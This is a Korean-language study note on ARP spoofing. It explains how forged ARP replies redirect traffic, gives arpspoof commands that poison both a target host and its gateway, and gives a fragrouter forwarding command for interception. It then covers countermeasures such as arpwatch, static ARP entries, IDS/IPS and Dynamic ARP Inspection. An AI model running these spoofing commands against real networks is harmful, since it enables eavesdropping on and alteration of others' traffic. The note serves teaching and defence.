ARP Spoofing, Fragrouter

 

<ARP Spoofing>

 

[설명]

공격자가 의도적으로 ARP Reply 패킷을 지속적으로 전송

타겟으로 하여금 공격자 자신에게 패킷을 보내게 하고, 패킷 도청, 변조 할수있다.

추가적으로 포워딩을 하여 원 도착자에게 전달도 가능하다

공격대상에서 나가는 패킷은 볼수있지만, 외부에서 공격대상에가 돌아가는 패킷은 볼수없을것이다

이럴때 게이트웨이에도 스푸핑 공격을 해서 양쪽 다 속이면 돌아오는 패킷도 볼수 있다.

 

ARP Reply       Opcode : 2

                      Sender MAC : 공격자 자신의 MAC

                      Sender IP : 위장할 IP

                      Target MAC : 타켓 MAC

                      Target IP : 타겟 IP

 

[Arpspoof 방법]

# arpspoof [-i Interface] [-t 공격대상IP] [내가 위장할 IP]

 

# arpspoof -i eth0 -t 10.10.10.255 10.10.10.254

 

[Forwarding 방법]

# fragrouter -B1                               // B1 => Nomal IP Forwarding

 

[실습 예]

# arpspoof -i eth0 -t 10.10.10.1 10.10.10.254             // 10.1 에게 내가 10.254 게이트웨이라고 속인다

# arpspoof -i eth0 -t 10.10.10.254 10.10.10.1            // 돌아오는 패킷을 보기위해 게이트웨이에게 내가 10.1 이라고 속인다

 

[확인]

관리자는 네트워크상에 너무 많은 ARP 패킷을 확인하게 된다

그래서 ARP 테이블 에서 특정 MAC 주소가 여러개 IP에 매칭되어 있는것을 확인한다

 

 

 

<ARP Spoofing 대응책>

 

[설정 대응]

 

arpwatch

특정 시점에 특정 IP 와 MAC 매칭 리스트를 작성하고 변조여부를 확인하여 관리자에게 알려준다

 

정적 ARP 설정

=> XP

arp -s [IP Address] [MAC Address]

> arp -s 10.10.10.254 cc-01-0f-4c-00-01

 

=> Win7

cmd 관리자 권한으로 실행

>netsh -c "interface ipv4"

netsh interface ipv4> set neighbors “로컬 영역 연결” “192.168.10.254” 00-10-7b-38-24-68

 

[장비 대응]

 

IPS : 침입방지

IDS : 침입탐지

 

특정 패턴으로 공격이 들어올시 IPS 장비는 필터링(즉, 차단)이 가능하고,

IDS 장비는 탐지하여 관리자에게 알려준다.

 

DAI : Dynamic ARP Inspection

시스코 스위치에서 ARP Spoofing 공격을 막기위해 차단하는 기능